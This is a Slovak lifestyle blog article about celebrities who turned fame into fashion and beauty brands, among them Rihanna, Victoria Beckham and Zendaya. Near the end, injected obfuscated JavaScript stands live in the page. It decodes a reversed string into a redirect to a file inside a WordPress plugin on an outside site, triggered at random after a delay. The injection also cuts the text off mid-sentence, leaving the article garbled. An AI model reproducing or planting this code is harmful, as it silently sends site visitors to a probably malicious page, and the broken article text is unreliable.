Keď sa celebrita stane značkou

| august 27, 2021

Uplynulé desaťročie bolo revolučné. Za posledných pár rokov sme boli svedkami množstva zmien, a to najmä pokiaľ ide o trendy v oblasti kultúry, módy, politiky, či krásy. Nástup sociálnych médií, ako je Instagram, navždy pretvoril vnútorné fungovanie popkultúry a vzostup éry influencerov dosiahol pri predaji produktov novú úroveň moci akú svet doposiaľ nepoznal. No a v neposlednom rade nás ako vlna z čista jasna zasiahol aj trend  celebritných značiek. Pozrime sa na tie najúspešnejšie globálne známe tváre, ktoré dokázali svoju slávu a mediálnu moc pretransformovať na vytvorenie ikonických značiek s miliónovou trhovou hodnotou.

RIHANNA
Uznávaná speváčka Rihanna si svoju ríšu módy a krásy začala budovať už v roku 2017. Všetky dcérske značky vrátane Fenty Beauty, Fenty x Puma a samozrejme Savage x Fenty sú úspešnými subjektmi, ktorých produkty sa držia na popredných predajných priečkach už od samotnému začiatku. A nie je sa čomu diviť. Napokon, veď práve tie jej zaručili titul bilionárky, za ktorú ju pred pár týžnami vyhlásil časopis Forbes. Začiatkom tohto mesiaca si Rihannina značka Fenty (ktorá bola uvedená na trh v máji) odniesla cenu British Fashion Award. S toľkými dosiahnutými úspechmi môžeme pokojne Rihannu označiť za úspešnú dizajnérku, ktorá svetu módy a krásy má čo ponúknuť a my sa už nemôžeme dočkať, čo nám priniesie nabudúce.

VICTORIA BECKHAM

Victoria Beckham je dôkazom toho, že kariérna cesta sa môže meniť bez ohľadu na to, koľko máte rokov. Potom, čo sa preslávila ako členka popovej formácie Spice Girls, využila svoju popularitu a podstúpila risk – rozhodla sa pre dráhu módnej návrhárky. Ako 34-ročná vydala svoju prvú líniu šiat a odvtedy jej úspech narástol do globálnych rozmerov. Jej  značka oslávila v roku 2018 svoje 10. výročie. Na jej oslavu bývala speváčka/ teraz módna dizajnérka debutovala s kolekciou kozmetiky takisto pod menom Victoria Beckham, ktorou si plánuje podmaniť aj beauty podsvetie a my jej za to môžeme len zatlieskať.

ZENDAYA

Zástupkyňou “mladej krvi” na našom zozname je mladá herečka a speváčka vystupujúca pod menom Zendaya. Len tento rok je jej výkon v americkom kultovom seriáli Euphoria posunul jej slávu a herecké schopnosti na novú úroveň, no a vo voľnom čase sa hviezda rada venuje navrhovaniu vlastnej módy. Uznávanej herečke sa vďaka opakovaným spoluprácam s Tommym Hilfigerom podarilo presadiť v módnom svete ako módnej návrhárke vďaka ich úspešným spoločným kolekciám. Minulý rok vydala dve zábavné zbierky inšpirované 70. rokmi, a my sa už teraz nemôžeme dočkať, ako sa spolupráca bude ďalej vyvíjať aj v ďalších rokoch.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“‘php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}mmyhilfiger.jpg”>ré v preklade znamená „žena, do ktorej je niekto zamilovaný“, je myšlienka, ktorá inšpirovala Emily k vydaniu jej vlastnej kolekcie zmyselného spodného prádla a plaviek, ktoré sú v dokonalom súlade s jej osobným štýlom a životnou filozofiou. Nuž, treba poznamenať, že aj vo svete módy sa vyčnievať niekedy oplatí – najmä ak ste supermodelka s vlastným názorom a pohľadom na život, pretože v tomto prípade jej to prinieslo obrovský úspech a ešte viac slávy. Značka oslávi tento rok svoje štvrté narodeniny a my jej k tomu srdečne gratulujeme.

Foto: lofficielmalaysia.com

Tags:

Category: HOMEPAGE, OSOBNOSTI

Comments are closed.